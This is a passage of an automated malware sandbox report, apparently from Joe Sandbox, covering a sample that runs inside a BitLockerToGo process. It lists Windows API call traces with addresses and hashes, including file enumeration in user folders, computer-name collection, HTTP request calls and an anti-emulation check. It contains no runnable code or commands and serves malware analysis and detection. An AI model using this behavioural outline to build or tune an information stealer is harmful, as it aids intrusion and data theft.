                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                                                                                      • String ID: ERROR$ERROR
                                                                                                                                                      • API String ID: 3287882509-2579291623
                                                                                                                                                      • Opcode ID: ced749b1db02a6195d4841b49078ca293138f5f03bc500498a5df3bb651919d7
                                                                                                                                                      • Instruction ID: a4ec5e783ceace2c8a4c88a9498d13a2d612528d04a95d406490d81fc8f7b94c
                                                                                                                                                      • Opcode Fuzzy Hash: ced749b1db02a6195d4841b49078ca293138f5f03bc500498a5df3bb651919d7
                                                                                                                                                      • Instruction Fuzzy Hash: 2D113070910108ABDB15FF64DDADAFD777AAF50300F804168ED0A6A590EF30AB09CF90
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 02768DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 02768E0B
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02764F7A
                                                                                                                                                      • lstrcat.KERNEL32(?,02771070), ref: 02764F97
                                                                                                                                                      • lstrcat.KERNEL32(?,029E4C08), ref: 02764FAB
                                                                                                                                                      • lstrcat.KERNEL32(?,02771074), ref: 02764FBD
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 0276492C
                                                                                                                                                        • Part of subcall function 02764910: FindFirstFileA.KERNEL32(?,?), ref: 02764943
                                                                                                                                                        • Part of subcall function 02764910: StrCmpCA.SHLWAPI(?,02770FDC), ref: 02764971
                                                                                                                                                        • Part of subcall function 02764910: StrCmpCA.SHLWAPI(?,02770FE0), ref: 02764987
                                                                                                                                                        • Part of subcall function 02764910: FindNextFileA.KERNEL32(000000FF,?), ref: 02764B7D
                                                                                                                                                        • Part of subcall function 02764910: FindClose.KERNEL32(000000FF), ref: 02764B92
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2667927680-0
                                                                                                                                                      • Opcode ID: ca834555c2fa88742a5b6a33e3b4fb0a8c4bd5cbfb9a3f3cdea1105c547ccb7c
                                                                                                                                                      • Instruction ID: 845521095554d8a7becc5e463f0e24a8be2ee1e14c51b83b0194e81038a3f8cb
                                                                                                                                                      • Opcode Fuzzy Hash: ca834555c2fa88742a5b6a33e3b4fb0a8c4bd5cbfb9a3f3cdea1105c547ccb7c
                                                                                                                                                      • Instruction Fuzzy Hash: 0621A1B6D442086BDB55FBA4DC4DFFD733DEB54300F404958BA4A92140EE749AD88FA2
                                                                                                                                                      APIs
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,029E4AD8), ref: 0276079A
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,029E4908), ref: 02760866
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,029E4C18), ref: 0276099D
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3722407311-0
                                                                                                                                                      • Opcode ID: 416b67dcf6a50116872512edebe2a2ea84e057463d21fc023e5a5dc61dbbfc0b
                                                                                                                                                      • Instruction ID: e8a837c536bc3a15d2f5f3d5efa75c7c673aa6fcb7eeb6c220ce9b08dd107233
                                                                                                                                                      • Opcode Fuzzy Hash: 416b67dcf6a50116872512edebe2a2ea84e057463d21fc023e5a5dc61dbbfc0b
                                                                                                                                                      • Instruction Fuzzy Hash: 12913475A102099FCB29EF64D999BFDB7B6FF94300F508519DC0A9B241DB30AA05CF91
                                                                                                                                                      APIs
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,029E4AD8), ref: 0276079A
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,029E4908), ref: 02760866
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,029E4C18), ref: 0276099D
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3722407311-0
                                                                                                                                                      • Opcode ID: 2202a4a876b01b8dfbfcf4e68a56cafb8b2c21247c158cf54e3aba13bacfff2c
                                                                                                                                                      • Instruction ID: a66387025f8ae64dd02133baaca5cc7254931890727a0cc1544d63f505bab844
                                                                                                                                                      • Opcode Fuzzy Hash: 2202a4a876b01b8dfbfcf4e68a56cafb8b2c21247c158cf54e3aba13bacfff2c
                                                                                                                                                      • Instruction Fuzzy Hash: 32814475A102099FCB19EF64D999BFDB7B6FF94300F508519D80A9F241DB30AA06CF91
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02766A2B), ref: 02767910
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02767917
                                                                                                                                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0276792F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1664310425-0
                                                                                                                                                      • Opcode ID: ee5f503a541407c70cfeb9f5a19a5efa676ac8aba17e4f2809b1e786d791bf3c
                                                                                                                                                      • Instruction ID: 4b808f1a695336c2562d2f141a7505241a74aae8cecfcd7522f5eeb9ee9af4d4
                                                                                                                                                      • Opcode Fuzzy Hash: ee5f503a541407c70cfeb9f5a19a5efa676ac8aba17e4f2809b1e786d791bf3c
                                                                                                                                                      • Instruction Fuzzy Hash: D801A2B1A44204EBD704DF89C849BBAFBB8F704B21F004259E905E2280C37455008BA1
                                                                                                                                                      APIs
                                                                                                                                                      • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C7F3095
                                                                                                                                                        • Part of subcall function 6C7F35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C87F688,00001000), ref: 6C7F35D5
                                                                                                                                                        • Part of subcall function 6C7F35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7F35E0
                                                                                                                                                        • Part of subcall function 6C7F35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7F35FD
                                                                                                                                                        • Part of subcall function 6C7F35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7F363F
                                                                                                                                                        • Part of subcall function 6C7F35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7F369F
                                                                                                                                                        • Part of subcall function 6C7F35A0: __aulldiv.LIBCMT ref: 6C7F36E4
                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7F309F
                                                                                                                                                        • Part of subcall function 6C815B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8156EE,?,00000001), ref: 6C815B85
                                                                                                                                                        • Part of subcall function 6C815B50: EnterCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815B90
                                                                                                                                                        • Part of subcall function 6C815B50: LeaveCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815BD8
                                                                                                                                                        • Part of subcall function 6C815B50: GetTickCount64.KERNEL32 ref: 6C815BE4
                                                                                                                                                      • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7F30BE
                                                                                                                                                        • Part of subcall function 6C7F30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C7F3127
                                                                                                                                                        • Part of subcall function 6C7F30F0: __aulldiv.LIBCMT ref: 6C7F3140
                                                                                                                                                        • Part of subcall function 6C82AB2A: __onexit.LIBCMT ref: 6C82AB30
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4291168024-0
                                                                                                                                                      • Opcode ID: 1484a2a87a11838f89d7edb7ccd5e04918b401f17c18668e552b136a7de395f0
                                                                                                                                                      • Instruction ID: 4a16f77e82b0a0c4cbb1b6a0c0530000cc0db25f29815486b7d4f2afd43dbc30
                                                                                                                                                      • Opcode Fuzzy Hash: 1484a2a87a11838f89d7edb7ccd5e04918b401f17c18668e552b136a7de395f0
                                                                                                                                                      • Instruction Fuzzy Hash: DAF0D622D2075496CB31EF7989891EA73B0AF7B218F50573AE85953611FB2066D8C3E2
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 02769484
                                                                                                                                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 027694A5
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 027694AF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3183270410-0
                                                                                                                                                      • Opcode ID: e27fcaf946006beef7fe122e84745cf080237bc452b1aa32d7ed4127c86e0667
                                                                                                                                                      • Instruction ID: 9bb1edfe8347a97048f6cb555d47475275a93b752d4c03a1004ac306cf02c924
                                                                                                                                                      • Opcode Fuzzy Hash: e27fcaf946006beef7fe122e84745cf080237bc452b1aa32d7ed4127c86e0667
                                                                                                                                                      • Instruction Fuzzy Hash: 58F05E74D4020CFBDB05DFA4D84AFFE7778EB08314F004498BB0997280D6B06A85CB90
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,02766A1C), ref: 0275112B
                                                                                                                                                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,02766A1C), ref: 02751132
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 02751143
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1103761159-0
                                                                                                                                                      • Opcode ID: d426f3d9233d82ec986c984e683cfae847f681b838f3f6adde8f2b384b86ebea
                                                                                                                                                      • Instruction ID: 7985ba633f09b9e64ca65afd7478eb1914d46aeb6cf8f021fa7a58334b409f52
                                                                                                                                                      • Opcode Fuzzy Hash: d426f3d9233d82ec986c984e683cfae847f681b838f3f6adde8f2b384b86ebea
                                                                                                                                                      • Instruction Fuzzy Hash: 86E0E670D99308FBE7106BA59C0EB197678EB04B12F504454F60D761C0D6F526109A99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 02767500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02767542
                                                                                                                                                        • Part of subcall function 02767500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0276757F
                                                                                                                                                        • Part of subcall function 02767500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02767603
                                                                                                                                                        • Part of subcall function 02767500: RtlAllocateHeap.NTDLL(00000000), ref: 0276760A
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                        • Part of subcall function 02767690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 027676A4
                                                                                                                                                        • Part of subcall function 02767690: RtlAllocateHeap.NTDLL(00000000), ref: 027676AB
